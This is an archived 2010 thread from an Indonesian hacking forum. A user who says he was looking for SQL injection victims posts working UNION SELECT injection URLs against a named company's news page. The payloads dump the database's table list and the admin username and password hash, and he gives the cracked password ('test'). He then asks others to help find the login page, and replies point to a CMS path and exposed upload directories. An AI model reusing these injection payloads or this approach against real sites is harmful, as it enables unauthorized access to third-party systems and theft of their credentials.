Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

Sqli di http://www.nexian.co.id/

http://xcode.or.id/forum/viewtopic.php?f=99&t=39041

Page 1 of 1

Sqli di http://www.nexian.co.id/

Posted: Mon May 10, 2010 10:12 pm
by cyber_criminal
kemaren aku lagi surfing lewat mbah google, mau nyari korban sqli,
:devil :devil :devil

trus ketemu bug sqli di http://www.nexian.co.id/, ini holenya

Code: Select all

http://www.nexian.co.id/news.php?mod=article&id=47
aku coba nyari tabelnya

Code: Select all

http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28table_name%29,3,4%20from%20information_schema.tables%20where%20table_schema=database%28%29--
ini dia tabel2nya :

Code: Select all

about,accessories,application,articles,career,commercial,contact,contactinfo,db_city,db_province,dealer,faq,music,product,type,users,wallpaper
yg ini hole untuk id dan password adminnya

Code: Select all

http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28username,0x3a,password%29,3,4%20from%20users
hasilnya

Code: Select all

admin:098f6bcd4621d373cade4e832627b4f6
setelah passnya dicrack menjadi

Code: Select all

098f6bcd4621d373cade4e832627b4f6 => test
tapi ada kendalanya, aku ngak bisa nemuin login pagenya, ada yg mau bantuin
:kaca: :kaca: :kaca:

Re: Sqli di http://www.nexian.co.id/

Posted: Tue May 11, 2010 1:25 am
by juara1
cm nemu disini aja ,,

http://www.nexian.co.id/cms/ :putusasa:

Re: Sqli di http://www.nexian.co.id/

Posted: Tue May 11, 2010 7:56 am
by the_nox
kerennnnnnnnnnnnnnnnnnnn
koq aku loem"" bisa"" ya...
belajar lagi duu ach..... :love:

Re: Sqli di http://www.nexian.co.id/

Posted: Tue May 11, 2010 2:27 pm
by Digital Cat
Image

Re: Sqli di http://www.nexian.co.id/

Posted: Tue May 11, 2010 7:26 pm
by cyber_criminal
sorry all, situsnya kayaknya udah di patch,
kayaknya di patchnya tanggal 10 mei habisnya pas aku mau buat thread ini aku ngecek sqlinya di http://www.nexian.co.id/,
trus pas mau buka situs ini lambat banget, mungkin aja pas itu lagi di maintenence

sorry ya
:putusasa: :putusasa: :putusasa:

Re: Sqli di http://www.nexian.co.id/

Posted: Tue May 11, 2010 7:42 pm
by 3xtr3m3b0y

Code: Select all

http://www.nexian.co.id/uploads/images/product/114/NX%20-%20G381i%202.jpg
http://www.nexian.co.id/uploads/images/product/
Gak tau kesalahanx pada konf Web Server or dimana...
File dan Direktori seakan2 kehapus, padahal sebenernya ada...
All times are UTC+07:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/